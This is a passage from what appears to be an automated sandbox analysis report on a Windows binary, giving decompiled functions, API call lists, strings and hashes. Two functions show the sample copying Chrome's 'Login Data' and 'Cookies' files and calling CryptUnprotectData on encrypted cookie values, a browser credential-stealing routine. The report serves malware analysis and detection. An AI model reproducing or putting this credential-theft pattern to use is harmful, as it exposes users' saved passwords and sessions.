                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocH_prolog3H_prolog3_catchLocal
                                                                                                                • String ID:
                                                                                                                • API String ID: 1948148156-0
                                                                                                                • Opcode ID: 14531506ad8ac4bd1dbe5d6e4df87a247a67ffe310dc1f8b82c709f0a5fcd1bc
                                                                                                                • Instruction ID: 8d02c0ed3407161e956927011c7a41ab25928950fe809df9d5705790e5419991
                                                                                                                • Opcode Fuzzy Hash: 14531506ad8ac4bd1dbe5d6e4df87a247a67ffe310dc1f8b82c709f0a5fcd1bc
                                                                                                                • Instruction Fuzzy Hash: 63E01271A712629BDF60B7A8440176DA0646B25F14F415104E6816B2C0EAB549845BC5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10004F21, Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 136fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10004F5D
                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,?,00000000,?,?), ref: 10004F71
                                                                                                                • _sprintf.LIBCMT ref: 10005098
                                                                                                                  • Part of subcall function 10007B5C: __vsnprintf_s.LIBCMT ref: 10007B71
                                                                                                                • GetFileAttributesW.KERNELBASE(C:\Users\user\AppData\Local\Google\Chrome\User Data\Default), ref: 10004F9F
                                                                                                                  • Part of subcall function 100052E4: _memset.LIBCMT ref: 1000530B
                                                                                                                  • Part of subcall function 100052E4: GetShortPathNameW.KERNEL32 ref: 10005320
                                                                                                                  • Part of subcall function 100052E4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,C:\Users\user\AppData\Local\Google\Chrome\User Data\Default), ref: 10005340
                                                                                                                  • Part of subcall function 100052E4: _malloc.LIBCMT ref: 10005349
                                                                                                                  • Part of subcall function 100052E4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,C:\Users\user\AppData\Local\Google\Chrome\User Data\Default), ref: 10005366
                                                                                                                  • Part of subcall function 100052E4: _free.LIBCMT ref: 1000536D
                                                                                                                • swprintf.LIBCMT ref: 10005010
                                                                                                                • swprintf.LIBCMT ref: 10005024
                                                                                                                • swprintf.LIBCMT ref: 10005037
                                                                                                                • CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Google\Chrome\USERDA~1\Default\Login Data.bak,?), ref: 10005049
                                                                                                                • _free.LIBCMT ref: 10005050
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: swprintf$ByteCharFileMultiPathWide_free_memset$AttributesCopyFolderNameShortSpecial__vsnprintf_s_malloc_sprintf
                                                                                                                • String ID: %s\%S$%s\Google\Chrome\User Data\Default$C:\Users\user\AppData\Local\Google\Chrome\USERDA~1\Default\Cookies$C:\Users\user\AppData\Local\Google\Chrome\USERDA~1\Default\Login Data.bak$C:\Users\user\AppData\Local\Google\Chrome\User Data\Default$Cookies$Login Data$Login Data.bak$chrome: path convert encode failed: %s$path not existed: %s
                                                                                                                • API String ID: 1508993333-861278874
                                                                                                                • Opcode ID: 0a029c23f5483d2ac44ee6c7388eb40c9223cb9d4b2767ccb2fc4fa287f99e6f
                                                                                                                • Instruction ID: 92d673adb865973023c05f72cc014490265a761ceb6f14a0c4745b779edc3c70
                                                                                                                • Opcode Fuzzy Hash: 0a029c23f5483d2ac44ee6c7388eb40c9223cb9d4b2767ccb2fc4fa287f99e6f
                                                                                                                • Instruction Fuzzy Hash: D141997A9002246BE730E7208C85EFF375CEF45690F400519FE4967286EBB16F4283E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10004A78, Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 346sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10004AFA
                                                                                                                • _memset.LIBCMT ref: 10004B10
                                                                                                                • Sleep.KERNEL32(00000064,?,00000000,?,00000000,100BAD4C,100BAB05,?,00000000,?,00000000,00000003,?,00000010,00000000,00000000), ref: 10004D88
                                                                                                                  • Part of subcall function 10003535: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 1000355A
                                                                                                                • __snprintf_s.LIBCMT ref: 10004DEA
                                                                                                                  • Part of subcall function 1007F459: __vsnprintf_s_l.LIBCMT ref: 1007F46E
                                                                                                                • _memset.LIBCMT ref: 10004EAE
                                                                                                                • _free.LIBCMT ref: 10004EC8
                                                                                                                • _free.LIBCMT ref: 10004ED9
                                                                                                                • _free.LIBCMT ref: 10004EE8
                                                                                                                  • Part of subcall function 100030BB: __EH_prolog3.LIBCMT ref: 100030C2
                                                                                                                  • Part of subcall function 10005CCD: __EH_prolog3.LIBCMT ref: 10005CD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free_memset$H_prolog3$CryptDataSleepUnprotect__snprintf_s__vsnprintf_s_l
                                                                                                                • String ID: hex(encrypted_value)$host_key$name$v10$value
                                                                                                                • API String ID: 3496831207-2465292722
                                                                                                                • Opcode ID: ad80ca27bfaad6e803ab1b68952cd0bdfee4c068cb8f8ca3566285b1f55a4196
                                                                                                                • Instruction ID: 7e4cacf9d3234e1e60ed4625f4af47353021805edecc7af7daa3b8b2616e4e1a
                                                                                                                • Opcode Fuzzy Hash: ad80ca27bfaad6e803ab1b68952cd0bdfee4c068cb8f8ca3566285b1f55a4196
                                                                                                                • Instruction Fuzzy Hash: 7FD1C1741083819FE321DF64C891F9BB7E8EF89380F51482DF58987196DF70A948CB66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01270E9F, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 167libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E01270E9F(void* __edx, intOrPtr _a4, signed int* _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				_Unknown_base(*)()* _t54;
				void* _t59;
				void* _t66;
				signed short _t70;
				void* _t74;
				void* _t82;
				_Unknown_base(*)()* _t89;
				struct HINSTANCE__* _t99;
				_Unknown_base(*)()* _t100;
				signed int _t101;
				void* _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t137;

				_t127 = __edx;
				_t51 =  *0x12aa3f0; // 0xddd5d539
				_v8 = _t51 ^ _t137;
				_t101 = _a16;
				_v36 = _a8;
				_t54 =  *0x1389e98; // 0xac10525a
				_v28 = _t101;
				_t128 = _a12;
				_v32 = _t128;
				if(_t54 != 0) {
					__imp__DecodePointer(_t54);
					_t132 = _t54;
					goto L4;
				} else {
					_t99 = GetModuleHandleW(L"kernel32.dll");
					if(_t99 == 0) {
						L6:
						 *_v36 =  *_v36 & 0x00000000;
						__imp__GetUserDefaultUILanguage();
						E01296A8A(_t55 & 0xfc00 | _t55 & 0x3ff,  &_v24, 7);
						_t59 = E01285715( &_v24);
						E0128655A(_t128,  *_v28,  &_v24);
						_t129 = _t59 + 1;
						E01296A8A(_t55 & 0x3ff,  &_v24, 7);
						_t66 = E01285715( &_v24);
						_t70 = E0128655A(_v32 + _t129 * 2,  *_v28 - _t129,  &_v24);
						_t130 = _t129 + _t66 + 1;
						__imp__GetSystemDefaultUILanguage();
						E01296A8A(_t70 & 0xfc00 | _t70 & 0x3ff,  &_v24, 7);
						_t74 = E01285715( &_v24);
						E0128655A(_v32 + _t130 * 2,  *_v28 - _t130,  &_v24);
						_t131 = _t130 + _t74 + 1;
						E01296A8A(_t70 & 0x3ff,  &_v24, 7);
						_t82 = E01285715( &_v24);
						_t101 = _v32;
						E0128655A(_t101 + _t131 * 2,  *_v28 - _t131,  &_v24);
						_t128 = _t131 + _t82 + 1;
						E01296A8A(0x800,  &_v24, 7);
						_t89 = E01285715( &_v24);
						_t132 = _t89;
						E0128655A(_t101 + _t128 * 2,  *_v28 - _t128,  &_v24);
						 *((short*)(_t101 + 2 + (_t89 + _t128) * 2)) = 0;
					} else {
						_t100 = GetProcAddress(_t99, "GetThreadPreferredUILanguages");
						_t132 = _t100;
						__imp__EncodePointer(_t132); // executed
						 *0x1389e98 = _t100;
						L4:
						if(_t132 == 0) {
							goto L6;
						} else {
							 *_t132(_a4, _v36, _t128, _t101);
						}
					}
				}
				return E012833E5(_t101, _v8 ^ _t137, _t127, _t128, _t132);
			}




























                                                                                                                0x01270e9f
                                                                                                                0x01270ea5
                                                                                                                0x01270eac
                                                                                                                0x01270eb3
                                                                                                                0x01270eb7
                                                                                                                0x01270eba
                                                                                                                0x01270ebf
                                                                                                                0x01270ec3
                                                                                                                0x01270ec6
                                                                                                                0x01270ecb
                                                                                                                0x01270ef9
                                                                                                                0x01270eff
                                                                                                                0x00000000
                                                                                                                0x01270ecd
                                                                                                                0x01270ed2
                                                                                                                0x01270eda
                                                                                                                0x01270f15
                                                                                                                0x01270f18
                                                                                                                0x01270f1b
                                                                                                                0x01270f3b
                                                                                                                0x01270f44
                                                                                                                0x01270f55
                                                                                                                0x01270f61
                                                                                                                0x01270f64
                                                                                                                0x01270f6d
                                                                                                                0x01270f88
                                                                                                                0x01270f90
                                                                                                                0x01270f92
                                                                                                                0x01270fb2
                                                                                                                0x01270fbb
                                                                                                                0x01270fd6
                                                                                                                0x01270fe0
                                                                                                                0x01270fe4
                                                                                                                0x01270fed
                                                                                                                0x01270ff8
                                                                                                                0x01271008
                                                                                                                0x01271012
                                                                                                                0x0127101a
                                                                                                                0x01271026
                                                                                                                0x0127102b
                                                                                                                0x0127103d
                                                                                                                0x01271047
                                                                                                                0x01270edc
                                                                                                                0x01270ee2
                                                                                                                0x01270ee8
                                                                                                                0x01270eeb
                                                                                                                0x01270ef1
                                                                                                                0x01270f01
                                                                                                                0x01270f03
                                                                                                                0x00000000
                                                                                                                0x01270f05
                                                                                                                0x01270f0e
                                                                                                                0x01270f0e
                                                                                                                0x01270f03
                                                                                                                0x01270eda
                                                                                                                0x01271062

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,?,00000108,01264142,?,?), ref: 01270ED2
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 01270EE2
                                                                                                                • RtlEncodePointer.NTDLL(00000000,?,?,?,00000108,01264142,?,?), ref: 01270EEB
                                                                                                                • DecodePointer.KERNEL32(AC10525A,?,?,?,?,?,00000108,01264142,?,?), ref: 01270EF9
                                                                                                                • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000108,01264142,?,?), ref: 01270F1B
                                                                                                                • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 01270F3B
                                                                                                                • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 01270F64
                                                                                                                • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01270F92
                                                                                                                • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 01270FB2
                                                                                                                • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 01270FE4
                                                                                                                • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 0127101A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DownlevelLocaleName___crt$DefaultLanguagePointer$AddressDecodeEncodeHandleModuleProcSystemUser
                                                                                                                • String ID: GetThreadPreferredUILanguages$kernel32.dll
                                                                                                                • API String ID: 404278886-1646127487
                                                                                                                • Opcode ID: d09d11b0a5dcac3e265a1970de776942a62bfe670f48e44a865fac40c1010649
                                                                                                                • Instruction ID: 9b07f1bcc3f6521b2494336fea1f5e7b046310ef985f4744c858a01a7ac1afd2
                                                                                                                • Opcode Fuzzy Hash: d09d11b0a5dcac3e265a1970de776942a62bfe670f48e44a865fac40c1010649
                                                                                                                • Instruction Fuzzy Hash: 695103B291020A9FDB14EFA8D989DFF77BCEF58304F014169E905E7244DB35AA048BB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012836E1, Relevance: 18.1, APIs: 12, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				void* _t18;
				void* _t19;
				intOrPtr _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				intOrPtr _t28;
				signed int _t39;
				void* _t41;
				void* _t48;
				signed int _t51;
				void* _t53;
				void* _t55;

				_t49 = __edi;
				_t48 = __edx;
				E01289640();
				_push(0x14);
				_push(0x12a7630);
				E01283AB0(__ebx, __edi, __esi);
				_t51 = E01289827() & 0x0000ffff;
				E012895F3(2);
				_t55 =  *0x1260000 - 0x5a4d; // 0x5a4d
				if(_t55 == 0) {
					_t17 =  *0x126003c; // 0x118
					__eflags =  *((intOrPtr*)(_t17 + 0x1260000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0x1260000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0x1260018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0x1260018)) != 0x10b) {
							goto L2;
						} else {
							_t39 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0x1260074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0x1260074)) > 0xe) {
								__eflags =  *(_t17 + 0x12600e8);
								_t6 =  *(_t17 + 0x12600e8) != 0;
								__eflags = _t6;
								_t39 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t39 = 0;
				}
				 *(_t53 - 0x1c) = _t39;
				_t18 = E01287F13();
				_t56 = _t18;
				if(_t18 == 0) {
					E0128383B(0x1c);
				}
				_t19 = E01288D80(_t39, _t49, _t56);
				_t57 = _t19;
				if(_t19 == 0) {
					_t19 = E0128383B(0x10);
				}
				E012896DC(_t19);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				if(E01288E15(_t39, _t49, _t51, _t57) < 0) {
					E0128383B(0x1b);
				}
				 *0x138c05c = GetCommandLineA(); // executed
				_t23 = E0128971C(_t48); // executed
				 *0x1389f34 = _t23;
				_t24 = E012890C9();
				_t59 = _t24;
				if(_t24 < 0) {
					E01286088(_t39, _t48, _t49, _t51, _t59, 8);
				}
				_t25 = E012892F8(_t39, _t48, _t49, _t51);
				_t60 = _t25;
				if(_t25 < 0) {
					E01286088(_t39, _t48, _t49, _t51, _t60, 9);
				}
				_t26 = E012860C2("true"); // executed
				_pop(_t41);
				_t61 = _t26;
				if(_t26 != 0) {
					E01286088(_t39, _t48, _t49, _t51, _t61, _t26);
					_pop(_t41);
				}
				_t27 = E01289BA5();
				_push(_t51);
				_t28 = E01296BB3(_t41, _t48, _t61, 0x1260000, 0, _t27); // executed
				_t52 = _t28;
				 *((intOrPtr*)(_t53 - 0x24)) = _t28;
				if(_t39 == 0) {
					E0128632B(_t52);
				}
				E012860B3();
				 *(_t53 - 4) = 0xfffffffe;
				return E01283AF5(_t52);
			}


















                                                                                                                0x012836e1
                                                                                                                0x012836e1
                                                                                                                0x012836e1
                                                                                                                0x012836eb
                                                                                                                0x012836ed
                                                                                                                0x012836f2
                                                                                                                0x012836fc
                                                                                                                0x01283701
                                                                                                                0x0128370c
                                                                                                                0x01283713
                                                                                                                0x01283719
                                                                                                                0x0128371e
                                                                                                                0x01283728
                                                                                                                0x00000000
                                                                                                                0x0128372a
                                                                                                                0x0128372f
                                                                                                                0x01283736
                                                                                                                0x00000000
                                                                                                                0x01283738
                                                                                                                0x01283738
                                                                                                                0x0128373a
                                                                                                                0x01283741
                                                                                                                0x01283743
                                                                                                                0x01283749
                                                                                                                0x01283749
                                                                                                                0x01283749
                                                                                                                0x01283749
                                                                                                                0x01283741
                                                                                                                0x01283736
                                                                                                                0x01283715
                                                                                                                0x01283715
                                                                                                                0x01283715
                                                                                                                0x01283715
                                                                                                                0x0128374c
                                                                                                                0x0128374f
                                                                                                                0x01283754
                                                                                                                0x01283756
                                                                                                                0x0128375a
                                                                                                                0x0128375f
                                                                                                                0x01283760
                                                                                                                0x01283765
                                                                                                                0x01283767
                                                                                                                0x0128376b
                                                                                                                0x01283770
                                                                                                                0x01283771
                                                                                                                0x01283776
                                                                                                                0x01283781
                                                                                                                0x01283785
                                                                                                                0x0128378a
                                                                                                                0x01283791
                                                                                                                0x01283796
                                                                                                                0x0128379b
                                                                                                                0x012837a0
                                                                                                                0x012837a5
                                                                                                                0x012837a7
                                                                                                                0x012837ab
                                                                                                                0x012837b0
                                                                                                                0x012837b1
                                                                                                                0x012837b6
                                                                                                                0x012837b8
                                                                                                                0x012837bc
                                                                                                                0x012837c1
                                                                                                                0x012837c4
                                                                                                                0x012837c9
                                                                                                                0x012837ca
                                                                                                                0x012837cc
                                                                                                                0x012837cf
                                                                                                                0x012837d4
                                                                                                                0x012837d4
                                                                                                                0x012837d5
                                                                                                                0x012837da
                                                                                                                0x012837e3
                                                                                                                0x012837e8
                                                                                                                0x012837ea
                                                                                                                0x012837ef
                                                                                                                0x012837f2
                                                                                                                0x012837f2
                                                                                                                0x012837f7
                                                                                                                0x0128382c
                                                                                                                0x0128383a

                                                                                                                APIs
                                                                                                                • ___security_init_cookie.LIBCMT ref: 012836E1
                                                                                                                • ___crtGetShowWindowMode.LIBCMT ref: 012836F7
                                                                                                                  • Part of subcall function 01289827: GetStartupInfoW.KERNEL32(?), ref: 01289831
                                                                                                                • _fast_error_exit.LIBCMT ref: 0128375A
                                                                                                                • _fast_error_exit.LIBCMT ref: 0128376B
                                                                                                                • __RTC_Initialize.LIBCMT ref: 01283771
                                                                                                                • _fast_error_exit.LIBCMT ref: 01283785
                                                                                                                • GetCommandLineA.KERNEL32(012A7630,00000014), ref: 0128378B
                                                                                                                • ___crtGetEnvironmentStringsA.LIBCMT ref: 01283796
                                                                                                                • __setargv.LIBCMT ref: 012837A0
                                                                                                                • __setenvp.LIBCMT ref: 012837B1
                                                                                                                • __cinit.LIBCMT ref: 012837C4
                                                                                                                • __wincmdln.LIBCMT ref: 012837D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _fast_error_exit$___crt$CommandEnvironmentInfoInitializeLineModeShowStartupStringsWindow___security_init_cookie__cinit__setargv__setenvp__wincmdln
                                                                                                                • String ID:
                                                                                                                • API String ID: 4062026167-0
                                                                                                                • Opcode ID: 898b9d0b49f7bf5bf582f8fa1be5c7731c0dc7ce1fae335fc2a3214951331c4e
                                                                                                                • Instruction ID: 20da54fe98521d2ceca2fd75433fff0cd367d95341433955b5e33ce6fb7865ef
                                                                                                                • Opcode Fuzzy Hash: 898b9d0b49f7bf5bf582f8fa1be5c7731c0dc7ce1fae335fc2a3214951331c4e
                                                                                                                • Instruction Fuzzy Hash: A62128B0A733039AEF29FFB89889B3D31647F20F19F144429E6019A0C1EFB4C5859769
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012676C9, Relevance: 16.6, APIs: 11, Instructions: 132COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E012676C9(void* __ebx, CHAR* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t49;
				void* _t53;
				CHAR* _t54;
				signed int _t58;
				CHAR* _t72;
				struct HRSRC__* _t77;
				void* _t78;
				void* _t90;
				struct HWND__* _t91;
				struct HINSTANCE__* _t92;
				CHAR* _t94;
				void* _t95;
				void* _t96;

				_t96 = __eflags;
				_t88 = __edx;
				_push(0x28);
				E01285BE3(E0129707E, __ebx, __edi, __esi);
				_t94 = __ecx;
				 *((intOrPtr*)(_t95 - 0x24)) = __ecx;
				_t90 =  *(__ecx + 0x7c);
				 *(_t95 - 0x14) =  *(__ecx + 0x80);
				 *(_t95 - 0x1c) = _t90;
				 *(_t95 - 0x20) =  *(E012692A5(__ebx, _t90, __ecx, _t96) + 0xc);
				_t97 = _t94[0x78];
				if(_t94[0x78] != 0) {
					_t92 =  *(E012692A5(0, _t90, _t94, _t97) + 0xc);
					 *(_t95 - 0x20) = _t92;
					_t77 = FindResourceA(_t92, _t94[0x78], 5); // executed
					_t78 = LoadResource(_t92, _t77);
					_t90 = _t78;
					 *(_t95 - 0x1c) = _t78;
				}
				if(_t90 == 0) {
					_t49 =  *(_t95 - 0x14);
				} else {
					_t49 = LockResource(_t90);
					 *(_t95 - 0x14) = _t49;
				}
				if(_t49 != 0) {
					_t82 = _t94;
					_t91 = E01267C36(0, _t94, __eflags);
					 *(_t95 - 0x30) = _t91;
					E0126A270(0, _t88, _t91);
					 *(_t95 - 0x2c) = 0;
					 *(_t95 - 0x18) = 0;
					 *(_t95 - 0x28) = 0;
					__eflags = _t91;
					if(__eflags != 0) {
						__eflags = _t91 - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled(_t91);
							if(__eflags != 0) {
								EnableWindow(_t91, 0);
								 *(_t95 - 0x2c) = 1;
								_t72 = E01263918();
								 *(_t95 - 0x18) = _t72;
								__eflags = _t72;
								if(__eflags != 0) {
									_t88 =  *_t72;
									_t82 = _t72;
									__eflags =  *((intOrPtr*)( *_t72 + 0x14c))();
									if(__eflags != 0) {
										_t82 =  *(_t95 - 0x18);
										__eflags = E0126F89B( *(_t95 - 0x18));
										if(__eflags != 0) {
											_t82 =  *(_t95 - 0x18);
											E0126F2A6( *(_t95 - 0x18), 0);
											 *(_t95 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					_push(_t94);
					 *(_t95 - 4) = 0;
					E0126A10E(0, _t88, _t91, _t94, __eflags);
					_t53 = E0126B33E(0, _t82, _t88, _t91);
					_t83 = _t94;
					_t54 = E0126766A(_t94, _t88, _t91, __eflags,  *(_t95 - 0x14), _t53,  *(_t95 - 0x20)); // executed
					__eflags = _t54;
					if(_t54 == 0) {
						__eflags = _t94[0x90];
						if(__eflags == 0) {
							 *(_t95 - 0x20) =  *(E012692A5(0, _t91, _t94, __eflags) + 8);
							E0126766A(_t94, _t88, _t91, __eflags,  *(_t95 - 0x14), E0126B33E(0, _t83, _t88, _t91),  *(_t95 - 0x20));
						}
					}
					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
					_t94[0x90] = 0;
					__eflags =  *(_t95 - 0x28);
					if( *(_t95 - 0x28) != 0) {
						E0126F2A6( *(_t95 - 0x18), "true");
					}
					__eflags =  *(_t95 - 0x2c);
					if( *(_t95 - 0x2c) != 0) {
						EnableWindow(_t91, "true");
					}
					__eflags = _t91;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() - _t94[0x20];
						if(__eflags == 0) {
							SetActiveWindow(_t91);
						}
					}
					 *((intOrPtr*)( *_t94 + 0x60))();
					E01267BED(0, _t94, _t88, _t91, _t94, __eflags);
					__eflags = _t94[0x78];
					if(_t94[0x78] != 0) {
						FreeResource( *(_t95 - 0x1c));
					}
					_t58 = _t94[0x60];
					goto L28;
				} else {
					_t58 = _t49 | 0xffffffff;
					L28:
					return E01285B48(_t58);
				}
			}
















                                                                                                                0x012676c9
                                                                                                                0x012676c9
                                                                                                                0x012676c9
                                                                                                                0x012676d0
                                                                                                                0x012676d5
                                                                                                                0x012676d7
                                                                                                                0x012676e0
                                                                                                                0x012676e3
                                                                                                                0x012676e6
                                                                                                                0x012676f3
                                                                                                                0x012676f6
                                                                                                                0x012676f9
                                                                                                                0x01267705
                                                                                                                0x01267709
                                                                                                                0x0126770c
                                                                                                                0x01267714
                                                                                                                0x0126771a
                                                                                                                0x0126771c
                                                                                                                0x0126771c
                                                                                                                0x01267721
                                                                                                                0x0126772f
                                                                                                                0x01267723
                                                                                                                0x01267724
                                                                                                                0x0126772a
                                                                                                                0x0126772a
                                                                                                                0x01267734
                                                                                                                0x0126773e
                                                                                                                0x01267745
                                                                                                                0x01267747
                                                                                                                0x0126774a
                                                                                                                0x0126774f
                                                                                                                0x01267752
                                                                                                                0x01267755
                                                                                                                0x01267758
                                                                                                                0x0126775a
                                                                                                                0x01267762
                                                                                                                0x01267764
                                                                                                                0x0126776d
                                                                                                                0x0126776f
                                                                                                                0x01267773
                                                                                                                0x01267779
                                                                                                                0x01267780
                                                                                                                0x01267785
                                                                                                                0x01267788
                                                                                                                0x0126778a
                                                                                                                0x0126778c
                                                                                                                0x0126778e
                                                                                                                0x01267796
                                                                                                                0x01267798
                                                                                                                0x0126779a
                                                                                                                0x012677a2
                                                                                                                0x012677a4
                                                                                                                0x012677a6
                                                                                                                0x012677aa
                                                                                                                0x012677af
                                                                                                                0x012677af
                                                                                                                0x012677a4
                                                                                                                0x01267798
                                                                                                                0x0126778a
                                                                                                                0x0126776f
                                                                                                                0x01267764
                                                                                                                0x012677b6
                                                                                                                0x012677b7
                                                                                                                0x012677ba
                                                                                                                0x012677c0
                                                                                                                0x012677c8
                                                                                                                0x012677ce
                                                                                                                0x012677d3
                                                                                                                0x012677d5
                                                                                                                0x012677d7
                                                                                                                0x012677dd
                                                                                                                0x012677e8
                                                                                                                0x012677f9
                                                                                                                0x012677f9
                                                                                                                0x012677dd
                                                                                                                0x012677fe
                                                                                                                0x01267802
                                                                                                                0x0126782f
                                                                                                                0x01267833
                                                                                                                0x0126783a
                                                                                                                0x0126783a
                                                                                                                0x0126783f
                                                                                                                0x01267843
                                                                                                                0x01267848
                                                                                                                0x01267848
                                                                                                                0x0126784e
                                                                                                                0x01267850
                                                                                                                0x01267858
                                                                                                                0x0126785b
                                                                                                                0x0126785e
                                                                                                                0x0126785e
                                                                                                                0x0126785b
                                                                                                                0x01267868
                                                                                                                0x0126786d
                                                                                                                0x01267872
                                                                                                                0x01267875
                                                                                                                0x0126787a
                                                                                                                0x0126787a
                                                                                                                0x01267880
                                                                                                                0x00000000
                                                                                                                0x01267736
                                                                                                                0x01267736
                                                                                                                0x01267883
                                                                                                                0x01267888
                                                                                                                0x01267888

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 012676D0
                                                                                                                • FindResourceA.KERNEL32(?,?,00000005), ref: 0126770C
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 01267714
                                                                                                                  • Part of subcall function 0126A270: UnhookWindowsHookEx.USER32(?), ref: 0126A29A
